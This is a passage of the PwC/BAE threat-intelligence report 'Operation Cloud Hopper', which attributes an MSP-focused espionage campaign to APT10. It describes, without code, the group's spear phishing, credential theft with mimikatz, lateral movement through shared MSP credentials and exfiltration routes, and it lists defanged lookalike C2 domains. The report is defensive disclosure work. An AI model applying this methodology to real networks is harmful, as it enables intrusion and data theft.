Operation Cloud Hopper - PwC/BAE

1. Operation
2. Cloud Hopper
3. www.pwc.co.uk/cyber
4. Exposing a systematic
5. hacking operation with an
6. unprecedented web of
7. global victims
8. April 2017
9. In collaboration with
10. 2 Operation Cloud Hopper
11. Contents
12. Foreword 3
13. Executive summary 4
14. APT10 as a China-based threat actor 5
15. Motivations behind APT10’s targeting 14
16. Shining a light on APT10’s methodology 16
17. Conclusion 20
18. Appendices 21
19. Operation Cloud Hopper 3
20. Foreword
21. This report is an initial public release of research PwC UK and
22. BAE Systems have conducted into new, sustained global
23. campaigns by an established threat actor against managed IT
24. service providers and their clients as well as several directly
25. targeted organisations in Japan. Given the scale of those
26. campaigns, the activity identified here is likely to reflect just a
27. small portion of the threat actor’s operations.
28. This report is primarily fact-based. Where we have made an
29. assessment this has been made clear by phraseology such as “we
30. assess”, and the use of estimative language as outlined in
31. Appendix A.
32. By publicly releasing this research, PwC UK and BAE Systems
33. hope to facilitate broad awareness of the attack techniques used
34. so that prevention and detection capabilities can be configured
35. accordingly. It is also hoped that rapid progress can be made
36. within the broader security community to further develop the
37. understanding of the campaign techniques we outline, leading to
38. additional public reports from peers across the security
39. community.
40. As a part of our research and reporting effort, PwC UK and BAE
41. Systems have collaborated with the UK’s National Cyber Security
42. Centre (NCSC) under its Certified Incident Response (CIR)
43. scheme to engage and notify managed IT service providers,
44. known affected organisations and other national bodies.
45. Supplementary to this report, an Annex containing our technical
46. analysis will be released.
47. 4 Operation Cloud Hopper
48. Executive summary
49. Since late 2016, PwC UK and BAE Systems have been assisting victims of a new cyber espionage campaign conducted by a
50. China-based threat actor. We assess this threat actor to almost certainly be the same as the threat actor widely known within
51. the security community as ‘APT10’. The campaign, which we refer to as Operation Cloud Hopper, has targeted managed IT
52. service providers (MSPs), allowing APT10 unprecedented potential access to the intellectual property and sensitive data of
53. those MSPs and their clients globally. A number of Japanese organisations have also been directly targeted in a separate,
54. simultaneous campaign by the same actor.
55. We have identified a number of key findings that are detailed below.
56. APT10 has recently unleashed a sustained campaign
57. against MSPs. The compromise of MSP networks has
58. provided broad and unprecedented access to MSP customer
59. networks.
60. • Multiple MSPs were almost certainly being targeted from
61. 2016 onwards, and it is likely that APT10 had already
62. begun to do so from as early as 2014.
63. • MSP infrastructure has been used as part of a complex web
64. of exfiltration routes spanning multiple victim networks.
65. APT10 has significantly increased its scale and capability
66. since early 2016, including the addition of new custom
67. tools.
68. • APT10 ceased its use of the Poison Ivy malware family
69. after a 2013 FireEye report, which comprehensively
70. detailed the malware’s functionality and features, and its
71. use by several China-based threat actors, including APT10.
72. • APT10 primarily used PlugX malware from 2014 to 2016,
73. progressively improving and deploying newer versions,
74. while simultaneously standardising their command and
75. control function.
76. • We have observed a shift towards the use of bespoke
77. malware as well as open-source tools, which have been
78. customised to improve their functionality. This is highly
79. likely to be indicative of an increase in sophistication.
80. Infrastructure observed in APT10’s most recent campaigns
81. links to previous activities undertaken by the threat actor.
82. • The command and control infrastructure used for
83. Operation Cloud Hopper is predominantly dynamic-DNS
84. domains, which are highly interconnected and link to the
85. threat actor’s previous operations. The number of
86. dynamic-DNS domains in use by the threat actor has
87. significantly increased since 2016, representative of an
88. increase in operational tempo.
89. • Some top level domains used in the direct targeting of
90. Japanese entities share common IP address space with the
91. network of dynamic-DNS domains that we associate with
92. Operation Cloud Hopper.
93. APT10 focuses on espionage activity, targeting intellectual
94. property and other sensitive data.
95. • APT10 is known to have exfiltrated a high volume of data
96. from multiple victims, exploiting compromised MSP
97. networks, and those of their customers, to stealthily move
98. this data around the world.
99. • The targeted nature of the exfiltration we have observed,
100. along with the volume of the data, is reminiscent of the
101. previous era of APT campaigns pre-2013.
102. PwC UK and BAE Systems assess APT10 as highly likely to
103. be a China-based threat actor.
104. • It is a widely held view within the cyber security
105. community that APT10 is a China-based threat actor.
106. • Our analysis of the compile times of malware binaries, the
107. registration times of domains attributed to APT10, and the
108. majority of its intrusion activity indicates a pattern of work
109. in line with China Standard Time (UTC+8).
110. • The threat actor’s targeting of diplomatic and political
111. organisations in response to geopolitical tensions, as well
112. as the targeting of specific commercial enterprises, is
113. closely aligned with strategic Chinese interests.
114. Operation Cloud Hopper 5
115. APT10 as a China-based threat actor
116. APT10 as a China-based threat actor
117. 1 The defence industrial base comprises the US Department of Defense and a plethora of companies that support the design, development and
118. maintenance of defence assets and enable US military requirements to be met. https://www.dhs.gov/defense-industrial-base-sector
119. 2 https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf
120. 3 http://blog.trendmicro.com/trendlabs-security-intelligence/evilgrab-malware-family-used-in-targeted-attacks-in-asia/
121. PwC UK and BAE Systems assess it is highly likely that APT10
122. is a China-based threat actor with a focus on espionage and
123. wide ranging information collection. It has been in operation
124. since at least 2009, and has evolved its targeting from an early
125. focus on the US defence industrial base (DIB)1
126. and the
127. technology and telecommunications sector, to a widespread
128. compromise of multiple industries and sectors across the
129. globe, most recently with a focus on MSPs.
130. APT10, a name originally coined by FireEye, is also referred to
131. as Red Apollo by PwC UK, CVNX by BAE Systems, Stone
132. Panda by CrowdStrike, and menuPass Team more broadly in
133. the public domain. The threat actor has previously been the
134. subject of a range of open source reporting, including most
135. notably a report by FireEye comprehensively detailing the
136. threat actor’s use of the Poison Ivy malware family2
137. and blog
138. posts by Trend Micro3
139. similarly detailing the use of EvilGrab
140. malware.
141. Alongside the research and ongoing tracking of APT10 by
142. both PwC UK and BAE’s Threat Intelligence teams, PwC UK’s
143. Incident Response team has been engaged in supporting
144. investigations linked to APT10 compromises. This research
145. has contributed to the assessments and conclusions we have
146. drawn regarding the recent campaign activity by APT10,
147. which represents a shift from previous activities linked to the
148. threat actor.
149. As a result of our analysis of APT10’s activities, we believe that
150. it almost certainly benefits from significant staffing and
151. logistical resources, which have increased over the last three
152. years, with a significant step-change in 2016. Due to the scale
153. of the threat actor’s operations throughout 2016 and 2017, we
154. similarly assess it currently comprises multiple teams, each
155. responsible for a different section of the day-to-day
156. operations, namely domain registration, infrastructure
157. management, malware development, target operations, and
158. analysis.
159. APT10 withdrew from direct targeting using Poison Ivy in
160. 2013 and conducted its first known retooling operation,
161. upgrading its capabilities and replatforming to use PlugX. It is
162. highly likely that this is due to the release of the 2013 FireEye
163. report.
164. Our report will detail the most recent campaigns conducted
165. by APT10, including the sustained targeting of MSPs, which
166. we have named Operation Cloud Hopper, and the targeting of
167. a number of Japanese institutions.
168. 6 Operation Cloud Hopper
169. Time-based analysis of APT10’s operations
170. 4 The bubbles shown on Figures 1 through 6 are representative of the number of events observed at that time and date.
171. As part of our analysis, we have made a number of
172. observations about APT10 and its profile, which supports our
173. assessment that APT10 is a China-based threat actor. For
174. example, we have identified patterns within the domain
175. registrations and file compilation times associated with
176. APT10 activity. This is almost certainly indicative of a threat
177. actor based in the UTC+8 time zone, which aligns to Chinese
178. Standard Time (CST).
179. Shown in Figure 1 are registration times4
180. , represented in UTC,
181. for known APT10 top level domains since mid-2016, which
182. mark a major uptick in APT10 activity.
183. Mapping this to UTC+8, as in Figure 2, shows a standard set
184. of Chinese business hours, including a two-hour midday
185. break.
186. Further analysis of the compile times of PlugX, RedLeaves and
187. Quasar malware samples used by APT10 reveals a similar
188. pattern in working hours, as shown in Figure 3.
189. Shifting this to UTC+8 shows a similar timeframe of
190. operation to the domain registrations. There are some
191. outliers, which are likely attributable to the operational
192. nature of this threat actor, such as requirements to work
193. outside normal business hours.
194. 00:00 02:00 04:00 06:00 08:00 10:00 12:00 14:00 16:00 18:00 20:00 22:00
195. 01:00 03:00 05:00 07:00 09:00 11:00 13:00 15:00 17:00 19:00 21:00 23:00
196. Jul 2017
197. Jan 2017
198. Jan 2016
199. Jan 2015
200. Jan 2014
201. Jul 2015
202. Jul 2015
203. Jul 2014
204. Jul 2013
205. Time of Day (UTC)
206. Date (days)
207. Figure 3: Compile times of PlugX, RedLeaves and Quasar in UTC
208. 00:00 02:00 04:00 06:00 08:00 10:00 12:00 14:00 16:00 18:00 20:00 22:00
209. 01:00 03:00 05:00 07:00 09:00 11:00 13:00 15:00 17:00 19:00 21:00 23:00
210. Apr 2017
211. Mar 2017
212. Jan 2017
213. Nov 2016
214. Sep 2016
215. Feb 2017
216. Dec 2016
217. Oct 2016
218. Aug 2016
219. Time of Day (UTC+8)
220. Date (days)
221. Figure 2: APT10 domain registration times in UTC+8
222. 00:00 02:00 04:00 06:00 08:00 10:00 12:00 14:00 16:00 18:00 20:00 22:00
223. 01:00 03:00 05:00 07:00 09:00 11:00 13:00 15:00 17:00 19:00 21:00 23:00
224. Apr 2017
225. Mar 2017
226. Jan 2017
227. Nov 2016
228. Sep 2016
229. Feb 2017
230. Dec 2016
231. Oct 2016
232. Aug 2016
233. Time of Day (UTC)
234. Date (days)
235. Figure 1: APT10 domain registration times in UTC
236. 00:00 02:00 04:00 06:00 08:00 10:00 12:00 14:00 16:00 18:00 20:00 22:00
237. 01:00 03:00 05:00 07:00 09:00 11:00 13:00 15:00 17:00 19:00 21:00 23:00
238. Time of Day (UTC+8)
239. Date (days)
240. Jul 2017
241. Jan 2017
242. Jan 2016
243. Jan 2015
244. Jan 2014
245. Jul 2015
246. Jul 2015
247. Jul 2014
248. Jul 2013
249. Figure 4: Compile times of PlugX, RedLeaves and Quasar in UTC+8
250. Operation Cloud Hopper 7
251. To further this analysis, we have observed the threat actor
252. conducting interactive activities primarily between the hours
253. of midnight and 10:00 UTC, as shown in Figure 7. When
254. converting this to UTC+8 we again see a shift to Chinese
255. business hours, with operations occurring between 08:00 and
256. 19:00. It is a realistic probability that the weekend work
257. observed in Figure 7 may be necessary as part of operational
258. requirements.
259. The sum of this analysis aligns with the evidence provided by
260. the United States Department of Justice indictment against
261. several individuals associated with APT1,5
262. another Chinabased
263. threat actor, showing a working day starting at 08:00
264. UTC+8 and finishing at 18:00 UTC+8 with a two hour lunch
265. break from 12:00 UTC+8 until 14:00 UTC+8.
266. 5 https://www.justice.gov/iso/opa/resources/5122014519132358461949.pdf
267. 00:00 02:00 04:00 06:00 08:00 10:00 12:00 14:00 16:00 18:00 20:00 22:00
268. 01:00 03:00 05:00 07:00 09:00 11:00 13:00 15:00 17:00 19:00 21:00 23:00
269. Dec 15, 2016
270. Dec 1, 2016
271. Nov 17, 2016
272. Nov 3, 2016
273. Oct 20, 2016
274. Oct 6, 2016
275. Sep 22, 2016
276. Time of Day (UTC+8)
277. Date (days)
278. Figure 6: Compile time of ChChes in UTC+8
279. 00:00 02:00 04:00 06:00 08:00 10:00 12:00 14:00 16:00 18:00 20:00 22:00
280. 01:00 03:00 05:00 07:00 09:00 11:00 13:00 15:00 17:00 19:00 21:00 23:00
281. Dec 15, 2016
282. Dec 1, 2016
283. Nov 17, 2016
284. Nov 3, 2016
285. Oct 20, 2016
286. Oct 6, 2016
287. Sep 22, 2016
288. Time of Day (UTC)
289. Date (days)
290. Figure 5: Compile time of ChChes in UTC
291. When applying the time shift to the ChChes malware (newly
292. used by APT10) compilation timestamps, we see a different
293. pattern as shown in Figure 5. While this does not align with
294. Chinese business hours, it is likely to be either a result of the
295. threat actor changing its risk profile by attempting to obscure
296. or confuse attribution or a developer’s side project that has
297. ended up being used on targeted operations. Based on other
298. technical overlaps, ChChes is highly likely to be exclusively
299. used by APT10.
300. 23
301. 00 :
302. 01:00
303. 02:00
304. 03:00
305. 04:00
306. 05:00
307. 06:00
308. 07:00
309. 08:00
310. 09:00
311. 10:00
312. 11:00
313. 12 0: 0
314. 13 0: 0
315. 14 0: 0
316. 15 0: 0
317. 61 0: 0
318. 00: 71
319. 00 : 18
320. 91 0: 0
321. 20:00
322. 21 0: 0
323. 22
324. 00 :
325. 00:00
326. Mon
327. Tue
328. Wed
329. Thur
330. Fri
331. Sat
332. Sun
333. Figure 7: Operational times of APT10 in UTC+8
334. Number of events
335. 0 1-10 11-20 21-30 31-40 41-50 50+
336. 8 Operation Cloud Hopper
337. Identifying a change in APT10’s
338. targeting
339. APT10 has, in the past, primarily been known for its
340. targeting of government and US defence industrial base
341. organisations, with the earliest known date of its activity
342. being in December 2009. Our research and observations
343. suggest that this targeting continues to date.
344. During the 2013 – 2014 period there was a general downturn
345. in the threat actor’s activities, as was also seen with other
346. related groups. It was widely assessed that this was due to
347. the public release of information surrounding APT1, which
348. exposed its toolset and infrastructure.
349. From our analysis and investigations, we have identified
350. APT10 as actively operating at least two specific campaigns,
351. one targeting MSPs and their clients, and one directly
352. targeting Japanese entities.
353. MSP focused campaign
354. APT10 has almost certainly been undertaking a
355. global operation of unprecedented size and scale
356. targeting a number of MSPs.
357. APT10 has vastly increased the scale and scope of its
358. targeting to include multiple sectors, which has likely been
359. facilitated by its compromise of MSPs. Such providers are
360. responsible for the remote management of customer IT and
361. end-user systems, thus they generally have unfettered and
362. direct access to their clients’ networks. They may also store
363. significant quantities of customer data on their own internal
364. infrastructure.
365. MSPs therefore represent a high-payoff target for espionagefocused
366. threat actors such as APT10. Given the level of client
367. network access MSPs have, once APT10 has gained access to
368. a MSP, it is likely to be relatively straightforward to exploit
369. this and move laterally onto the networks of potentially
370. thousands of other victims. This, in turn, would provide
371. access to a larger amount of intellectual property and
372. sensitive data. APT10 has been observed to exfiltrate stolen
373. intellectual property via the MSPs, hence evading local
374. network defences.
375. 6 https://security.googleblog.com/2011/08/update-on-attempted-man-in-middle.html
376. 7 https://krebsonsecurity.com/2014/02/target-hackers-broke-in-via-hvac-company/
377. 8 https://www.fireeye.com/blog/threat-research/2014/03/a-detailed-examination-of-the-siesta-campaign.html
378. Other threat actors have previously been observed using
379. a similar method of a supply chain attack, for example, in
380. the compromise of Dutch certificate authority Diginotar in
381. 20116
382. and the compromise of US retailer Target in 2013.7
383. The command and control (C2) infrastructure chosen by
384. APT10 for Operation Cloud Hopper is predominantly
385. referenced using dynamic-DNS domains. The various
386. domains are highly-interconnected through shared IP
387. address hosting, even linking back historically to the threat
388. actor’s much older operations.
389. At present, the indicators detailing APT10’s operations
390. number into the thousands and cannot be easily visualised.
391. The graph in Figure 8 overleaf depicts a high-level view of the
392. infrastructure used by APT10 throughout 2016. As the
393. campaign has progressed into 2017, the number of dynamicDNS
394. domains in use by the threat actor has significantly
395. increased.
396. The graph in Figure 9, also shown overleaf, extracts one node
397. of the newer C2 from the infrastructure shown in Figure 8
398. and maps this to the older infrastructure of APT10, as
399. disclosed by FireEye in their 2014 Siesta Campaign blog
400. post8. In terms of timing, it is highly likely that a single party
401. is responsible for all of these domains, based on our
402. observations of infrastructure overlap.
403. Through our investigations, we have identified multiple
404. victims who have been infiltrated by the threat actor. Several
405. of these provide enterprise services or cloud hosting,
406. supporting our assessment that APT10 are almost certainly
407. targeting MSPs. We believe that the observed targeting of
408. MSPs is part of a widescale supply-chain attack.
409. Operation Cloud Hopper 9
410. Figure 8: High-level view of infrastructure used by APT10 throughout 2016
411. Figure 9: Infrastructure graph linking early Plugx domains to recent APT10 domains
412. 10 Operation Cloud Hopper
413. Countries targeted
414. Business and Professional Services
415. Energy and Mining
416. Metals
417. Pharmaceuticals and Life Science
418. Public sector
419. Retail and Consumer
420. Technology
421. Industrial manufacturing
422. Engineering and Construction
423. Sectors targeted
424. India
425. Brazil
426. USA
427. Canada
428. Japan South Korea
429. South Africa Australia
430. Finland
431. Sweden
432. Norway
433. Switzerland France
434. Thailand
435. Operation Cloud Hopper 11
436. Japan focused campaign
437. 9 http://thediplomat.com/2016/04/japans-achilles-heel-cybersecurity/
438. In a separate series of operations, APT10 has been
439. systematically targeting Japanese organisations using
440. bespoke malware referred to in the public domain as ‘ChChes’.
441. While linked to APT10, via shared infrastructure, this
442. campaign exhibits some operational differences suggesting a
443. potential sub-division within the threat actor. These
444. operations have seen APT10 masquerading as legitimate
445. Japanese public sector entities (such as the Ministry of Foreign
446. Affairs, Japan International Cooperation Agency and the
447. Liberal Democratic Party of Japan) to gain access to the victim
448. organisations.
449. Targeting of these entities by APT10 is consistent with
450. previous targeting by China-based threat actors of a wide
451. range of industries and sectors in Japan. This includes the
452. targeting of commercial companies, and government
453. agencies, both of which has resulted in the exfiltration of large
454. amounts of data.9
455. APT10’s standard compromise methodology begins with a
456. spear phishing email sent to the target, usually with an
457. executable attachment designed to lure the victim to open it.
458. Analysis of the filenames associated with some of the latest
459. APT10 malware samples, particularly from late 2016,
460. highlights the use of Japanese language filenames which
461. clearly indicates a campaign targeting Japanese-speaking
462. individuals. Further analysis of these files can be found in
463. Annex B.
464. Table 1 shows some example file names being used by APT10
465. in this campaign.
466. Table 1: Japanese language filenames used by APT10
467. Japanese Filename Translation
468. 1102毎日新聞(回答)._exe 1102 Mainich Newspaper (answer)._exe
469. 2016県立大学シンポジウムA4＿1025.exe 2016 Prefectural University Symposium A4_1025.exe
470. 事務連絡案内状(28.11.07).exe Business contact invitation (28.11.07).exe
471. 個人番号の提供について.exe Regarding provision of Individual number.exe
472. 日米拡大抑止協議e Japan-US expansion deterrence conference (e)
473. ロシア歴史協会の設立と「単一」国史教科書の作成.exe Foundation of Russian historical association and Composing 「a unity」
474. state history textbook.exe
475. The following is an example of a malicious decoy document referencing Mitsubishi Heavy Industries:
476. Figure 10: Decoy document based on press
477. release from Japanese firm Mitsubishi
478. Heavy Industries detailing the unveiling of
479. their new ABLASER-DUV (Deep Ultraviolet
480. Laser)
481. 12 Operation Cloud Hopper
482. A notable tactic of this APT10 subset is to register C2 domains that closely resemble legitimate Japanese organisations. Table 2
483. shows a selection of the spoofed domains registered, alongside the email addresses listed at registration and the legitimate
484. impersonated domains.
485. Table 2: Domains observed being impersonated by APT10
486. Domain Imitating Theme Description
487. bdoncloud[.]com Unknown Cloud Generic Cloud theme
488. cloud-kingl[.]com
489. cloud-maste[.]com
490. incloud-go[.]com
491. incloud-obert[.]com
492. catholicmmb[.]com cmmb.org Religion Catholic Medical Mission Board
493. ccfchrist[.]com ccf.org.ph Christ’s Commission Fellowship – based in Philippines
494. cwiinatonal[.]com cwi.org.uk Christian Witnesses to Israel
495. usffunicef[.]com unicefusa.org Charity United States Fund For Unicef
496. salvaiona[.]com salvationarmy.org The Salvation Army
497. meiji-ac-jp[.]com meiji.ac.jp Japan /
498. Academic
499. Meiji University in Japan
500. u-tokyo-ac-jp[.]com u-tokyo.ac.jp Tokyo University in Japan
501. jica-go-jp[.]bike jica.go.jp Japan / Public
502. Sector
503. Japan International Cooperation Agency
504. jica-go-jp[.]biz jica.go.jp Japan International Cooperation Agency
505. jimin-jp[.]biz jimin.jp Liberal Democratic Party of Japan
506. mofa-go-jp[.]com mofa.go.jp Ministry of Foreign Affairs
507. The top level C2 domains observed in this campaign share a number of features that can be used to further identify affiliated
508. nodes. Table 3 displaying registrant information can be seen below:
509. Table 3: Known APT10 registration details showing a common name server
510. Domain Registrant email Name Server Contact Name Contact Street
511. belowto[.]com robertorivera@india.com ns1.ititch.com Roberto Rivera 904 Peck Street Manchester, NH 03103
512. ccfchrist[.]com wenonatmcmurray@india.com ns1.ititch.com Wenona
513. McMurray
514. 824 Ocala Street Winter Park, FL 32789
515. cloud-maste[.]
516. com
517. meganfdelgado@india.com ns1.ititch.com Megan Delgado 3328 Sigley Road Burlingame, KS 66413
518. poulsenv[.]com abellonav.poulsen@yandex.com ns1.ititch.com Abellona
519. Poulsen
520. 2187 Findley Avenue Carrington, ND
521. 58421
522. unhamj[.]com juanitardunham@india.com ns1.ititch.com Juanita Dunham 745 Melody Lane Richmond, VA 23219
523. wthelpdesk[.]com armandovalcala@india.com ns1.ititch.com Armando Alcala 608 Irish Lane Madison, WI 53718
524. Operation Cloud Hopper 13
525. None of the domains share identical contact information other
526. than stating that the respective registrants are based in the
527. US. The contact streets, organisations, and names are all
528. distinct between domains.
529. Some of the domains, that do resolve, share common IP
530. address space with the network of dynamic-DNS domains that
531. we associate with Operation Cloud Hopper as detailed earlier
532. in the report. This connection is highlighted in the
533. infrastructure graph shown in Figure 11 below, where some
534. ChChes C2 domains can be seen in the bottom left, while on
535. the far right are the older APT10 domains referenced in
536. previous reporting.
537. Figure 11: Infrastructure graph linking early PlugX domains to recent ChChes domains
538. 14 Operation Cloud Hopper Operation Cloud Hopper 14
539. Motivations behind APT10’s targeting
540. A short history of China-based hacking
541. China-based threat actors have a long history of cyber espionage in the traditional political, military and defensive arena, as
542. well as industrial espionage for economic gain. Some of the most notable of these events from the past decade are shown below
543. Figure 12: – Timeline of China-based hacking activity
544. 2006
545. 2007
546. 2008
547. 2009
548. 2010
549. 2011
550. 2012
551. 2013
552. 2014
553. 2015
554. 2006-13: APT1 conducted a
555. widespread cyber espionage
556. campaign against hundreds of
557. organisations spanning a number of
558. sectors. Most victims primarily
559. conducted their business in English and
560. had a nexus with China’s strategic
561. priorities.
562. 2010: Technology, financial and
563. defence sectors were targeted by
564. Operation Aurora, a campaign
565. attributed to APT17/Aurora Panda. The
566. list of targets included Google, who
567. suffered the loss of intellectual property
568. and attempted access to the Gmail
569. accounts of human rights activists.
570. 2014: The data of 4.5 million
571. members of US-based healthcare
572. organisation, Community Health
573. Systems was potentially accessed
574. during a breach attributed to APT18.
575. 2010-12: Between 2010 and
576. 2012 organisations in the energy
577. and material manufacturing sectors
578. were targeted. These included
579. Westinghouse Electric, who had technical
580. and design specifications for pipes, pipe
581. supports and routing stolen in 2010.
582. Additionally, emails of senior
583. decision-makers involved in the business
584. relationship with a Chinese state-owned
585. enterprise were taken. In 2012,
586. SolarWorld was compromised with
587. attackers stealing sensitive business
588. information relating to manufacturing
589. metrics, and production line information
590. and costs. It is thought to have been
591. targeted strategically at a time when
592. Chinese manufacturers of solar products
593. were seeking to enter the US market at
594. below fair value prices.
595. 2009: The Night Dragon campaign
596. involved covert cyber attacks on
597. global oil, energy and petrochemical
598. companies and individuals in Kazakhstan,
599. Taiwan, Greece and the US. The attackers
600. used a number of vectors including social
601. engineering and OS vulnerabilities to access
602. proprietary operations and financial
603. information
604. 2009: GhostNet is the alleged
605. Chinese group responsible for
606. running a global campaign starting in
607. 2009 targeting foreign embassies and
608. ministries, NGOs, news media institutions
609. and Tibet-related organisations.
610. 2013: Operation Iron Tiger is an
611. attack campaign attributed to APT31,
612. in which US government contractors were
613. targeted in the areas of technology,
614. telecommunications, energy and
615. manufacturing.
616. 2009: Three medical device
617. makers (Medtronic, Boston Scientific,
618. St. Jude Medical) were allegedly
619. compromised by Chinese actors. Although
620. the motive is unclear, patient data was not
621. thought to be stolen, making industrial
622. espionage the most likely intention.
623. 2014-15: The personal data of over
624. 20 million people was compromised
625. from the US Office of Personnel
626. Management and attributed to China-based
627. actors. This included Social Security
628. numbers as well as security clearance and
629. job applications for government positions.
630. 2014-15: Several healthcare firms
631. were targeted – Anthem, Premera
632. Blue Cross and CareFirst all suffered data
633. breaches in 2015. These were linked
634. to APT19.
635. Operation Cloud Hopper 15
636. APT10 alignment with previous China-based hacking
637. 10 https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
638. 11 https://www.pwccn.com/en/migration/pdf/govt-work-review-mar2016.pdf
639. 12 http://www.pwccn.com/en/migration/pdf/prosperity-masses-2020.pdf
640. Espionage attacks associated with China-based threat actors,
641. as noted above, have traditionally targeted organisations that
642. are of strategic value to Chinese businesses and where
643. intellectual property obtained from such attacks could
644. facilitate domestic growth or advancement.
645. There has been significant open source reporting which has
646. documented the alignment between apparent information
647. collection efforts of China-based threat actors and the
648. strategic emerging industries documented in China’s Five Year
649. Plan (FYP).10 The 13th FYP was released in March 2016 and
650. the sectors and organisations known to be targeted by APT10
651. are broadly in line with the strategic aims documented in this
652. plan. These aims outlined in the FYP will largely dictate the
653. growth of businesses in China and are, therefore, likely to also
654. form part of Chinese companies’ business strategies.
655. The latest FYP describes five principles which underpin
656. China’s goal of doubling its 2010 GDP by 2020. At the
657. forefront of these principles is innovation, largely focused
658. around technological innovation, with China expected to
659. invest 2.5% of GDP in research and development to attain
660. technological advances, which are anticipated to contribute
661. 60% towards economic growth objectives.11 The areas of
662. innovation expected to receive extensive investment include,
663. next-generation communications, new energy, new materials,
664. aerospace, biological medicine and smart manufacturing.
665. In addition to the FYP principle of innovation, China is also
666. promoting ten key industries in which it wants to improve
667. innovation in manufacturing as part of the ‘Made in China
668. 2025’ initiative.12
669. Observed APT10 targeting is in line with many of the historic
670. compromises we have outlined previously as originating from
671. China. This targeting spans industries that align with China’s
672. 13th FYP which would provide valuable information to
673. advance the domestic innovation goals held within China.
674. Given the broad spectrum of priority industries, the
675. compromise of MSPs represents an efficient method of
676. information collection. This strategy also provides additional
677. obfuscation for the actor as any data exfiltrated is taken back
678. through the initial compromised company’s systems, creating
679. a much more difficult trail to follow.
680. ‘Made in
681. China 2025’
682. industries
683. Agricultural
684. machinery
685. Next
686. generation
687. information
688. technology Numeric
689. control
690. tools and
691. robotics
692. Aerospace
693. equipment
694. Ocean
695. engineering
696. equipment
697. and high-tech
698. ships
699. Railway
700. equipment Energy
701. saving and
702. new energy
703. vehicles
704. Power
705. equipment
706. New
707. materials
708. Medicine
709. and
710. medical
711. devices
712. Figure 13: Industries of interest outlined by ‘Made in China
713. 2025’ initiative
714. 16 Operation Cloud Hopper
715. Shining a light on APT10’s methodology
716. This section details changes made to APT10 tools, techniques
717. and procedures (TTPs) post-2014, following its shift from
718. Poison Ivy to PlugX. These TTPs have been identified as part
719. of our incident response and threat intelligence investigations
720. and have been used in both of the recent campaigns we have
721. encountered. The examples provided in this section will be
722. drawn from both of those campaigns.
723. Reconnaissance and targeting
724. It is often difficult to identify the early stages of a threat
725. actor’s preparation for an attack as these initial activities tend
726. to occur below the line of visibility. Our analysis of the most
727. recently used decoy documents by APT10 in its spear phishing
728. campaigns, which is the primary delivery method of its
729. payloads, indicates the actor performs a significant level of
730. research on its targets. In line with commonly used APT actor
731. methodologies, the threat actor aligns its decoy documents to
732. a topic of interest relevant to the recipient.
733. In the example shown in Figure 14 to the right, an official
734. document hosted on the Japan Society for the Promotion of
735. Science website was weaponised and deployed as part of a
736. spear phishing campaign against a Japanese target in the
737. education sector.
738. Figure 14: Decoy document used by APT10 to target the
739. Japanese education sector
740. APT10 has been known to use research from their
741. reconnaissance to obtain company email addresses, and then
742. craft a message containing either a malicious attachment or a
743. link to a malicious site.
744. 1 2
745. 3
746. 4
747. 5
748. 6
749. MSP
750. TargetedMSP
751. MSP customer
752. MSP
753. Targeted
754. Data
755. Customer
756. used for exfiltration
757. APT
758. 10
759. APT10
760. compromises
761. Managed IT
762. Service Providers
763. MSP customers who
764. align to APT10’s
765. targeting profile are
766. accessed by the threat
767. actor using the MSPs
768. legitimate access
769. Compressed files filled
770. with stolen data are
771. moved from the MSP
772. customer’s network
773. back onto the MSP
774. network
775. APT10 exfiltrates stolen
776. data back through
777. MSPs to infrastructure
778. controlled by the threat
779. actor
780. Data of interest to APT10
781. is accessed by the threat
782. actor moving laterally
783. through systems
784. MSP customer data
785. collected by APT and
786. compressed, ready
787. for exfiltration from
788. the network
789. Operation Cloud Hopper 17
790. As part of the same campaign, we have also observed an email
791. sent by APT10,13 referencing a Scientific Research Grant
792. Program, and targeting various Japanese education institutes
793. including Meiji University14 and Chuo University.15 The email
794. included a zip file containing a link to download a payload
795. from one of APT10’s servers, the ChChes Powersploit exploit,
796. detailed in Annex B.
797. Initial compromise and lateral
798. movement
799. Once on a target network, the actor rapidly deploys malware
800. to establish a foothold, which may include one or more
801. systems that provide sustained access to a victim’s network.
802. As APT10 works to gain further privileges and access, it also
803. conducts internal reconnaissance, mapping out the network
804. using common Windows tools, and in later stages of the
805. compromise using open source pentesting tools, detailed in
806. Annex B.
807. This reconnaissance is run in parallel with the actor ensuring
808. that it has access to legitimate credentials. We have observed
809. that in cases where APT10 has infiltrated a target via an MSP,
810. it continues to use the MSPs credentials. In order to gain any
811. further credentials, APT10 will usually deploy credential theft
812. tools such as mimikatz or PwDump, sometimes using DLL load
813. order hijacking, to use against a domain controller, explained
814. further in Annex B. Regular communications checks are then
815. executed in order to maintain this level of access. In most
816. cases, these stolen MSP credentials have provided
817. administrator or domain administrator privileges.
818. We have observed the threat actor copying malware over to
819. systems in a compromised environment, which did not have
820. 13 http://csirt.ninja/?p=1103
821. 14 http://www.meiji.ac.jp/isc/information/2016/6t5h7p00000mjbbr.html
822. 15 http://www.chuo-u.ac.jp/research/rd/grant/news/2017/01/51783/
823. any outbound internet access. In one of these instances, the
824. threat actor spent more than an hour attempting to establish
825. an outbound connection using PlugX until it realised that the
826. host had no internet access, at which point the malware and
827. all supporting files where deleted. APT10 achieves persistence
828. on its targets primarily by using scheduled tasks or Windows
829. services in order to ensure the malware remains active
830. regardless of system reboots.
831. APT10 heavily leverages the shared nature of client-side MSP
832. infrastructure to move laterally between MSPs and other
833. victims. Systems that share access and thus credentials, from
834. both a MSP and one of its clients serve as a way of hopping
835. between the two.
836. Client infrastructure
837. MSP infrastructure
838. Systems sharing credentials across the client and the
839. MSP are of particular interest to APT10, and are
840. commonly used by the threat actor in order to gain
841. access to new areas of the network
842. Figure 16: Client – MSP shared infrastructure
843. 2009 2013 2014 2016 2017
844. 2009
845. Group first detected
846. targeting Western
847. defence companies
848. 2014
849. Targets East Asian
850. manufacturer and
851. Japanese Public
852. Policy organisations
853. Q4 2014
854. Targets European
855. organisations
856. Q4 2016
857. Targets Japanese
858. organisations
859. Q1 2017
860. APT10 sustains
861. targeting of
862. European
863. organisations
864. August 2013
865. FireEye - Poison Ivy:
866. Assessing damage
867. and extracting
868. intelligence
869. March 2014
870. Trend Micro &
871. FireEye release
872. reports on links
873. between APT1 and
874. APT10
875. Legend
876. APT10 activity
877. Other events
878. Figure 15: Timeline of APT10 related activities Summary of APT10 activity
879. 18 Operation Cloud Hopper
880. APT10 simultaneously targets both low profile and high value
881. systems to gain network persistence and a high level of access
